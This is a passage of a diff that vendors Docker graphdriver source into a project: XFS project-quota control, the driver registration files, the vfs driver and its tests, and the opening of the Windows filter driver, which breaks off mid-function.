PRJQUOTA) +#endif +*/ +import "C" +import ( + "fmt" + "io/ioutil" + "os" + "path" + "path/filepath" + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" +) + +// Quota limit params - currently we only control blocks hard limit +type Quota struct { + Size uint64 +} + +// Control - Context to be used by storage driver (e.g. overlay) +// who wants to apply project quotas to container dirs +type Control struct { + backingFsBlockDev string + nextProjectID uint32 + quotas map[string]uint32 +} + +// NewControl - initialize project quota support. +// Test to make sure that quota can be set on a test dir and find +// the first project id to be used for the next container create. +// +// Returns nil (and error) if project quota is not supported. +// +// First get the project id of the home directory. +// This test will fail if the backing fs is not xfs. +// +// xfs_quota tool can be used to assign a project id to the driver home directory, e.g.: +// echo 999:/var/lib/docker/overlay2 >> /etc/projects +// echo docker:999 >> /etc/projid +// xfs_quota -x -c 'project -s docker' / +// +// In that case, the home directory project id will be used as a "start offset" +// and all containers will be assigned larger project ids (e.g. >= 1000). +// This is a way to prevent xfs_quota management from conflicting with docker. +// +// Then try to create a test directory with the next project id and set a quota +// on it. If that works, continue to scan existing containers to map allocated +// project ids. +// +func NewControl(basePath string) (*Control, error) { + // + // Get project id of parent dir as minimal id to be used by driver + // + minProjectID, err := getProjectID(basePath) + if err != nil { + return nil, err + } + minProjectID++ + + // + // create backing filesystem device node + // + backingFsBlockDev, err := makeBackingFsDev(basePath) + if err != nil { + return nil, err + } + + // + // Test if filesystem supports project quotas by trying to set + // a quota on the first available project id + // + quota := Quota{ + Size: 0, + } + if err := setProjectQuota(backingFsBlockDev, minProjectID, quota); err != nil { + return nil, err + } + + q := Control{ + backingFsBlockDev: backingFsBlockDev, + nextProjectID: minProjectID + 1, + quotas: make(map[string]uint32), + } + + // + // get first project id to be used for next container + // + err = q.findNextProjectID(basePath) + if err != nil { + return nil, err + } + + logrus.Debugf("NewControl(%s): nextProjectID = %d", basePath, q.nextProjectID) + return &q, nil +} + +// SetQuota - assign a unique project id to directory and set the quota limits +// for that project id +func (q *Control) SetQuota(targetPath string, quota Quota) error { + + projectID, ok := q.quotas[targetPath] + if !ok { + projectID = q.nextProjectID + + // + // assign project id to new container directory + // + err := setProjectID(targetPath, projectID) + if err != nil { + return err + } + + q.quotas[targetPath] = projectID + q.nextProjectID++ + } + + // + // set the quota limit for the container's project id + // + logrus.Debugf("SetQuota(%s, %d): projectID=%d", targetPath, quota.Size, projectID) + return setProjectQuota(q.backingFsBlockDev, projectID, quota) +} + +// setProjectQuota - set the quota for project id on xfs block device +func setProjectQuota(backingFsBlockDev string, projectID uint32, quota Quota) error { + var d C.fs_disk_quota_t + d.d_version = C.FS_DQUOT_VERSION + d.d_id = C.__u32(projectID) + d.d_flags = C.XFS_PROJ_QUOTA + + d.d_fieldmask = C.FS_DQ_BHARD | C.FS_DQ_BSOFT + d.d_blk_hardlimit = C.__u64(quota.Size / 512) + d.d_blk_softlimit = d.d_blk_hardlimit + + var cs = C.CString(backingFsBlockDev) + defer C.free(unsafe.Pointer(cs)) + + _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XSETPQLIM, + uintptr(unsafe.Pointer(cs)), uintptr(d.d_id), + uintptr(unsafe.Pointer(&d)), 0, 0) + if errno != 0 { + return fmt.Errorf("Failed to set quota limit for projid %d on %s: %v", + projectID, backingFsBlockDev, errno.Error()) + } + + return nil +} + +// GetQuota - get the quota limits of a directory that was configured with SetQuota +func (q *Control) GetQuota(targetPath string, quota *Quota) error { + + projectID, ok := q.quotas[targetPath] + if !ok { + return fmt.Errorf("quota not found for path : %s", targetPath) + } + + // + // get the quota limit for the container's project id + // + var d C.fs_disk_quota_t + + var cs = C.CString(q.backingFsBlockDev) + defer C.free(unsafe.Pointer(cs)) + + _, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XGETPQUOTA, + uintptr(unsafe.Pointer(cs)), uintptr(C.__u32(projectID)), + uintptr(unsafe.Pointer(&d)), 0, 0) + if errno != 0 { + return fmt.Errorf("Failed to get quota limit for projid %d on %s: %v", + projectID, q.backingFsBlockDev, errno.Error()) + } + quota.Size = uint64(d.d_blk_hardlimit) * 512 + + return nil +} + +// getProjectID - get the project id of path on xfs +func getProjectID(targetPath string) (uint32, error) { + dir, err := openDir(targetPath) + if err != nil { + return 0, err + } + defer closeDir(dir) + + var fsx C.struct_fsxattr + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + uintptr(unsafe.Pointer(&fsx))) + if errno != 0 { + return 0, fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) + } + + return uint32(fsx.fsx_projid), nil +} + +// setProjectID - set the project id of path on xfs +func setProjectID(targetPath string, projectID uint32) error { + dir, err := openDir(targetPath) + if err != nil { + return err + } + defer closeDir(dir) + + var fsx C.struct_fsxattr + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR, + uintptr(unsafe.Pointer(&fsx))) + if errno != 0 { + return fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error()) + } + fsx.fsx_projid = C.__u32(projectID) + fsx.fsx_xflags |= C.FS_XFLAG_PROJINHERIT + _, _, errno = syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR, + uintptr(unsafe.Pointer(&fsx))) + if errno != 0 { + return fmt.Errorf("Failed to set projid for %s: %v", targetPath, errno.Error()) + } + + return nil +} + +// findNextProjectID - find the next project id to be used for containers +// by scanning driver home directory to find used project ids +func (q *Control) findNextProjectID(home string) error { + files, err := ioutil.ReadDir(home) + if err != nil { + return fmt.Errorf("read directory failed : %s", home) + } + for _, file := range files { + if !file.IsDir() { + continue + } + path := filepath.Join(home, file.Name()) + projid, err := getProjectID(path) + if err != nil { + return err + } + if projid > 0 { + q.quotas[path] = projid + } + if q.nextProjectID <= projid { + q.nextProjectID = projid + 1 + } + } + + return nil +} + +func free(p *C.char) { + C.free(unsafe.Pointer(p)) +} + +func openDir(path string) (*C.DIR, error) { + Cpath := C.CString(path) + defer free(Cpath) + + dir := C.opendir(Cpath) + if dir == nil { + return nil, fmt.Errorf("Can't open dir") + } + return dir, nil +} + +func closeDir(dir *C.DIR) { + if dir != nil { + C.closedir(dir) + } +} + +func getDirFd(dir *C.DIR) uintptr { + return uintptr(C.dirfd(dir)) +} + +// Get the backing block device of the driver home directory +// and create a block device node under the home directory +// to be used by quotactl commands +func makeBackingFsDev(home string) (string, error) { + fileinfo, err := os.Stat(home) + if err != nil { + return "", err + } + + backingFsBlockDev := path.Join(home, "backingFsBlockDev") + // Re-create just in case comeone copied the home directory over to a new device + syscall.Unlink(backingFsBlockDev) + stat := fileinfo.Sys().(*syscall.Stat_t) + if err := syscall.Mknod(backingFsBlockDev, syscall.S_IFBLK|0600, int(stat.Dev)); err != nil { + return "", fmt.Errorf("Failed to mknod %s: %v", backingFsBlockDev, err) + } + + return backingFsBlockDev, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go new file mode 100644 index 0000000000..262954d6e3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_aufs,linux + +package register + +import ( + // register the aufs graphdriver + _ "github.com/docker/docker/daemon/graphdriver/aufs" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go new file mode 100644 index 0000000000..f456cc5ce5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_btrfs,linux + +package register + +import ( + // register the btrfs graphdriver + _ "github.com/docker/docker/daemon/graphdriver/btrfs" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go new file mode 100644 index 0000000000..bb2e9ef541 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_devicemapper,linux + +package register + +import ( + // register the devmapper graphdriver + _ "github.com/docker/docker/daemon/graphdriver/devmapper" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go new file mode 100644 index 0000000000..9ba849cedc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go @@ -0,0 +1,9 @@ +// +build !exclude_graphdriver_overlay,linux + +package register + +import ( + // register the overlay graphdriver + _ "github.com/docker/docker/daemon/graphdriver/overlay" + _ "github.com/docker/docker/daemon/graphdriver/overlay2" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go new file mode 100644 index 0000000000..98fad23b20 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go @@ -0,0 +1,6 @@ +package register + +import ( + // register vfs + _ "github.com/docker/docker/daemon/graphdriver/vfs" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go new file mode 100644 index 0000000000..efaa5005ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go @@ -0,0 +1,6 @@ +package register + +import ( + // register the windows graph driver + _ "github.com/docker/docker/daemon/graphdriver/windows" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go new file mode 100644 index 0000000000..8f34e35537 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go @@ -0,0 +1,8 @@ +// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd, solaris + +package register + +import ( + // register the zfs driver + _ "github.com/docker/docker/daemon/graphdriver/zfs" +) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go new file mode 100644 index 0000000000..8832d11531 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go @@ -0,0 +1,145 @@ +package vfs + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/idtools" + + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + // CopyWithTar defines the copy method to use. + CopyWithTar = chrootarchive.CopyWithTar +) + +func init() { + graphdriver.Register("vfs", Init) +} + +// Init returns a new VFS driver. +// This sets the home directory for the driver and returns NaiveDiffDriver. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + d := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + } + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { + return nil, err + } + return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil +} + +// Driver holds information about the driver, home directory of the driver. +// Driver implements graphdriver.ProtoDriver. It uses only basic vfs operations. +// In order to support layering, files are copied from the parent layer into the new layer. There is no copy-on-write support. +// Driver must be wrapped in NaiveDiffDriver to be used as a graphdriver.Driver +type Driver struct { + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap +} + +func (d *Driver) String() string { + return "vfs" +} + +// Status is used for implementing the graphdriver.ProtoDriver interface. VFS does not currently have any status information. +func (d *Driver) Status() [][2]string { + return nil +} + +// GetMetadata is used for implementing the graphdriver.ProtoDriver interface. VFS does not currently have any meta data. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver. +func (d *Driver) Cleanup() error { + return nil +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create prepares the filesystem for the VFS driver and copies the directory for the given id under the parent. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + if opts != nil && len(opts.StorageOpt) != 0 { + return fmt.Errorf("--storage-opt is not supported for vfs") + } + + dir := d.dir(id) + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(filepath.Dir(dir), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(dir, 0755, rootUID, rootGID); err != nil { + return err + } + labelOpts := []string{"level:s0"} + if _, mountLabel, err := label.InitLabels(labelOpts); err == nil { + label.SetFileLabel(dir, mountLabel) + } + if parent == "" { + return nil + } + parentDir, err := d.Get(parent, "") + if err != nil { + return fmt.Errorf("%s: %s", parent, err) + } + if err := CopyWithTar(parentDir, dir); err != nil { + return err + } + return nil +} + +func (d *Driver) dir(id string) string { + return filepath.Join(d.home, "dir", filepath.Base(id)) +} + +// Remove deletes the content from the directory for a given id. +func (d *Driver) Remove(id string) error { + if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// Get returns the directory for the given id. +func (d *Driver) Get(id, mountLabel string) (string, error) { + dir := d.dir(id) + if st, err := os.Stat(dir); err != nil { + return "", err + } else if !st.IsDir() { + return "", fmt.Errorf("%s: not a directory", dir) + } + return dir, nil +} + +// Put is a noop for vfs that return nil for the error, since this driver has no runtime resources to clean up. +func (d *Driver) Put(id string) error { + // The vfs driver has no runtime resources (e.g. mounts) + // to clean up, so we don't need anything here + return nil +} + +// Exists checks to see if the directory exists for the given id. +func (d *Driver) Exists(id string) bool { + _, err := os.Stat(d.dir(id)) + return err == nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go new file mode 100644 index 0000000000..9ecf21dbaa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go @@ -0,0 +1,37 @@ +// +build linux + +package vfs + +import ( + "testing" + + "github.com/docker/docker/daemon/graphdriver/graphtest" + + "github.com/docker/docker/pkg/reexec" +) + +func init() { + reexec.Init() +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestVfsSetup and TestVfsTeardown +func TestVfsSetup(t *testing.T) { + graphtest.GetDriver(t, "vfs") +} + +func TestVfsCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "vfs") +} + +func TestVfsCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "vfs") +} + +func TestVfsCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "vfs") +} + +func TestVfsTeardown(t *testing.T) { + graphtest.PutDriver(t) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go new file mode 100644 index 0000000000..beac93ae75 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go @@ -0,0 +1,886 @@ +//+build windows + +package windows + +import ( + "bufio" + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + "unsafe" + + "github.com/Microsoft/go-winio" + "github.com/Microsoft/go-winio/archive/tar" + "github.com/Microsoft/go-winio/backuptar" + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/longpath" + "github.com/docker/docker/pkg/reexec" + units "github.com/docker/go-units" + "golang.org/x/sys/windows" +) + +// filterDriver is an HCSShim driver type for the Windows Filter driver. +const filterDriver = 1 + +var ( + // mutatedFiles is a list of files that are mutated by the import process + // and must be backed up and restored. + mutatedFiles = map[string]string{ + "UtilityVM/Files/EFI/Microsoft/Boot/BCD": "bcd.bak", + "UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG": "bcd.log.bak", + "UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG1": "bcd.log1.bak", + "UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG2": "bcd.log2.bak", + } + noreexec = false +) + +// init registers the windows graph drivers to the register. +func init() { + graphdriver.Register("windowsfilter", InitFilter) + // DOCKER_WINDOWSFILTER_NOREEXEC allows for inline processing which makes + // debugging issues in the re-exec codepath significantly easier. + if os.Getenv("DOCKER_WINDOWSFILTER_NOREEXEC") != "" { + logrus.Warnf("WindowsGraphDriver is set to not re-exec. This is intended for debugging purposes only.") + noreexec = true + } else { + reexec.Register("docker-windows-write-layer", writeLayerReexec) + } +} + +type checker struct { +} + +func (c *checker) IsMounted(path string) bool { + return false +} + +// Driver represents a windows graph driver. +type Driver struct { + // info stores the shim driver information + info hcsshim.DriverInfo + ctr *graphdriver.RefCounter + // it is safe for windows to use a cache here because it does not support + // restoring containers when the daemon dies. + cacheMu sync.Mutex + cache map[string]string +} + +// InitFilter returns a new Windows storage filter driver. +func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + logrus.Debugf("WindowsGraphDriver InitFilter at %s", home) + + fsType, err := getFileSystemType(string(home[0])) + if err != nil { + return nil, err + } + if strings.ToLower(fsType) == "refs" { + return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home) + } + + d := &Driver{ + info: hcsshim.DriverInfo{ + HomeDir: home, + Flavour: filterDriver, + }, + cache: make(map[string]string), + ctr: graphdriver.NewRefCounter(&checker{}), + } + return d, nil +} + +// win32FromHresult is a helper function to get the win32 error code from an HRESULT +func win32FromHresult(hr uintptr) uintptr { + if hr&0x1fff0000 == 0x00070000 { + return hr & 0xffff + } + return hr +} + +// getFileSystemType obtains the type of a file system through GetVolumeInformation +// https://msdn.microsoft.com/en-us/library/windows/desktop/aa364993(v=vs.85).aspx +func getFileSystemType(drive string) (fsType string, hr error) { + var ( + modkernel32 = windows.NewLazySystemDLL("kernel32.dll") + procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW") + buf = make([]uint16, 255) + size = syscall.MAX_PATH + 1 + ) + if len(drive) != 1 { + hr = errors.New("getFileSystemType must be called with a drive letter") + return + } + drive += `:\` + n := uintptr(unsafe.Pointer(nil)) + r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0) + if int32(r0) < 0 { + hr = syscall.Errno(win32FromHresult(r0)) + } + fsType = syscall.UTF16ToString(buf) + return +} + +// String returns the string representation of a driver. This should match +// the name the graph driver has been registered with. +func (d *Driver) String() string { + return "windowsfilter" +} + +// Status returns the status of the driver. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"Windows", ""}, + } +} + +// Exists returns true if the given id is registered with this driver. +func (d *Driver) Exists(id string) bool { + rID, err := d.resolveID(id) + if err != nil { + return false + } + result, err := hcsshim.LayerExists(d.info, rID) + if err != nil { + return false + } + return result +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + if opts != nil { + return d.create(id, parent, opts.MountLabel, false, opts.StorageOpt) + } + return d.create(id, parent, "", false, nil) +} + +// Create creates a new read-only layer with the given id. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + if opts != nil { + return d.create(id, parent, opts.MountLabel, true, opts.StorageOpt) + } + return d.create(id, parent, "", true, nil) +} + +func (d *Driver) create(id, parent, mountLabel string, readOnly bool, storageOpt map[string]string) error { + rPId, err := d.resolveID(parent) + if err != nil { + return err + } + + parentChain, err := d.getLayerChain(rPId) + if err != nil { + return err + } + + var layerChain []string + + if rPId != "" { + parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId) + if err != nil { + return err + } + if _, err := os.Stat(filepath.Join(parentPath, "Files")); err == nil { + // This is a legitimate parent layer (not the empty "-init" layer), + // so include it in the layer chain. + layerChain = []string{parentPath} + } + } + + layerChain = append(layerChain, parentChain...) + + if readOnly { + if err := hcsshim.CreateLayer(d.info, id, rPId); err != nil { + return err + } + } else { + var parentPath string + if len(layerChain) != 0 { + parentPath = layerChain[0] + } + + if err := hcsshim.CreateSandboxLayer(d.info, id, parentPath, layerChain); err != nil { + return err + } + + storageOptions, err := parseStorageOpt(storageOpt) + if err != nil { + return fmt.Errorf("Failed to parse storage options - %s", err) + } + + if storageOptions.size != 0 { + if err := hcsshim.ExpandSandboxSize(d.info, id, storageOptions.size); err != nil { + return err + } + } + } + + if _, err := os.Lstat(d.dir(parent)); err != nil { + if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil { + logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2) + } + return fmt.Errorf("Cannot create layer with missing parent %s: %s", parent, err) + } + + if err := d.setLayerChain(id, layerChain); err != nil { + if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil { + logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2) + } + return err + } + + return nil +} + +// dir returns the absolute path to the layer. +func (d *Driver) dir(id string) string { + return filepath.Join(d.info.HomeDir, filepath.Base(id)) +} + +// Remove unmounts and removes the dir information. +func (d *Driver) Remove(id string) error { + rID, err := d.resolveID(id) + if err != nil { + return err + } + + // This retry loop is due to a bug in Windows (Internal bug #9432268) + // if GetContainers fails with ErrVmcomputeOperationInvalidState + // it is a transient error. Retry until it succeeds. + var computeSystems []hcsshim.ContainerProperties + retryCount := 0 + for { + // Get and terminate any template VMs that are currently using the layer + computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{}) + if err != nil { + if err == hcsshim.ErrVmcomputeOperationInvalidState { + if retryCount >= 5 { + // If we are unable to get the list of containers + // go ahead and attempt to delete the layer anyway + // as it will most likely work. + break + } + retryCount++ + time.Sleep(2 * time.Second) + continue + } + return err + } + break + } + + for _, computeSystem := range computeSystems { + if strings.Contains(computeSystem.RuntimeImagePath, id) && computeSystem.IsRuntimeTemplate { + container, err := hcsshim.OpenContainer(computeSystem.ID) + if err != nil { + return err + } + defer container.Close() + err = container.Terminate() + if hcsshim.IsPending(err) { + err = container.Wait() + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + return err + } + } + } + + layerPath := filepath.Join(d.info.HomeDir, rID) + tmpID := fmt.Sprintf("%s-removing", rID) + tmpLayerPath := filepath.Join(d.info.HomeDir, tmpID) + if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) { + return err + } + if err := hcsshim.DestroyLayer(d.info, tmpID); err != nil { + logrus.Errorf("Failed to DestroyLayer %s: %s", id, err) + } + + return nil +} + +// Get returns the rootfs path for the id. This will mount the dir at its given path. +func (d *Driver) Get(id, mountLabel string) (string, error) { + logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel) + var dir string + + rID, err := d.resolveID(id) + if err != nil { + return "", err + } + if count := d.ctr.Increment(rID); count > 1 { + return d.cache[rID], nil + } + + // Getting the layer paths must be done outside of the lock. + layerChain, err := d.getLayerChain(rID) + if err != nil { + d.ctr.Decrement(rID) + return "", err + } + + if err := hcsshim.ActivateLayer(d.info, rID); err != nil { + d.ctr.Decrement(rID) + return "", err + } + if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil { + d.ctr.Decrement(rID) + if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { + logrus.Warnf("Failed to Deactivate %s: %s", id, err) + } + return "", err + } + + mountPath, err := hcsshim.GetLayerMountPath(d.info, rID) + if err != nil { + d.ctr.Decrement(rID) + if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { + logrus.Warnf("Failed to Deactivate %s: %s", id, err) + } + return "", err + } + d.cacheMu.Lock() + d.cache[rID] = mountPath + d.cacheMu.Unlock() + + // If the layer has a mount path, use that. Otherwise, use the + // folder path. + if mountPath != "" { + dir = mountPath + } else { + dir = d.dir(id) + } + + return dir, nil +} + +// Put adds a new layer to the driver. +func (d *Driver) Put(id string) error { + logrus.Debugf("WindowsGraphDriver Put() id %s", id) + + rID, err := d.resolveID(id) + if err != nil { + return err + } + if count := d.ctr.Decrement(rID); count > 0 { + return nil + } + d.cacheMu.Lock() + delete(d.cache, rID) + d.cacheMu.Unlock() + + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { + return err + } + return hcsshim.DeactivateLayer(d.info, rID) +} + +// Cleanup ensures the information the driver stores is properly removed. +func (d *Driver) Cleanup() error { + return nil +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". +// The layer should be mounted when calling this function +func (d *Driver) Diff(id, parent string) (_ io.ReadCloser, err error) { + rID, err := d.resolveID(id) + if err != nil { + return + } + + layerChain, err := d.getLayerChain(rID) + if err != nil { + return + } + + // this is assuming that the layer is unmounted + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { + return nil, err + } + prepare := func() { + if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil { + logrus.Warnf("Failed to Deactivate %s: %s", rID, err) + } + } + + arch, err := d.exportLayer(rID, layerChain) + if err != nil { + prepare() + return + } + return ioutils.NewReadCloserWrapper(arch, func() error { + err := arch.Close() + prepare() + return err + }), nil +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +// The layer should not be mounted when calling this function. +func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { + rID, err := d.resolveID(id) + if err != nil { + return nil, err + } + parentChain, err := d.getLayerChain(rID) + if err != nil { + return nil, err + } + + if err := hcsshim.ActivateLayer(d.info, rID); err != nil { + return nil, err + } + defer func() { + if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { + logrus.Errorf("changes() failed to DeactivateLayer %s %s: %s", id, rID, err2) + } + }() + + var changes []archive.Change + err = winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { + r, err := hcsshim.NewLayerReader(d.info, id, parentChain) + if err != nil { + return err + } + defer r.Close() + + for { + name, _, fileInfo, err := r.Next() + if err == io.EOF { + return nil + } + if err != nil { + return err + } + name = filepath.ToSlash(name) + if fileInfo == nil { + changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeDelete}) + } else { + // Currently there is no way to tell between an add and a modify. + changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeModify}) + } + } + }) + if err != nil { + return nil, err + } + + return changes, nil +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. +// The layer should not be mounted when calling this function +func (d *Driver) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + var layerChain []string + if parent != "" { + rPId, err := d.resolveID(parent) + if err != nil { + return 0, err + } + parentChain, err := d.getLayerChain(rPId) + if err != nil { + return 0, err + } + parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId) + if err != nil { + return 0, err + } + layerChain = append(layerChain, parentPath) + layerChain = append(layerChain, parentChain...) + } + + size, err := d.importLayer(id, diff, layerChain) + if err != nil { + return 0, err + } + + if err = d.setLayerChain(id, layerChain); err != nil { + return 0, err + } + + return size, nil +} + +// DiffSize calculates the changes between the specified layer +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (d *Driver) DiffSize(id, parent string) (size int64, err error) { + rPId, err := d.resolveID(parent) + if err != nil { + return + } + + changes, err := d.Changes(id, rPId) + if err != nil { + return + } + + layerFs, err := d.Get(id, "") + if err != nil { + return + } + defer d.Put(id) + + return archive.ChangesSize(layerFs, changes), nil +} + +// GetMetadata returns custom driver information. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + m := make(map[string]string) + m["dir"] = d.dir(id) + return m, nil +} + +func writeTarFromLayer(r hcsshim.LayerReader, w io.Writer) error { + t := tar.NewWriter(w) + for { + name, size, fileInfo, err := r.Next() + if err == io.EOF { + break + } + if err != nil { + return err + } + if fileInfo == nil { + // Write a whiteout file. + hdr := &tar.Header{ + Name: filepath.ToSlash(filepath.Join(filepath.Dir(name), archive.WhiteoutPrefix+filepath.Base(name))), + } + err := t.WriteHeader(hdr) + if err != nil { + return err + } + } else { + err = backuptar.WriteTarFileFromBackupStream(t, r, name, size, fileInfo) + if err != nil { + return err + } + } + } + return t.Close() +} + +// exportLayer generates an archive from a layer based on the given ID. +func (d *Driver) exportLayer(id string, parentLayerPaths []string) (io.ReadCloser, error) { + archive, w := io.Pipe() + go func() { + err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { + r, err := hcsshim.NewLayerReader(d.info, id, parentLayerPaths) + if err != nil { + return err + } + + err = writeTarFromLayer(r, w) + cerr := r.Close() + if err == nil { + err = cerr + } + return err + }) + w.CloseWithError(err) + }() + + return archive, nil +} + +// writeBackupStreamFromTarAndSaveMutatedFiles reads data from a tar stream and +// writes it to a backup stream, and also saves any files that will be mutated +// by the import layer process to a backup location. +func writeBackupStreamFromTarAndSaveMutatedFiles(buf *bufio.Writer, w io.Writer, t *tar.Reader, hdr *tar.Header, root string) (nextHdr *tar.Header, err error) { + var bcdBackup *os.File + var bcdBackupWriter *winio.BackupFileWriter + if backupPath, ok := 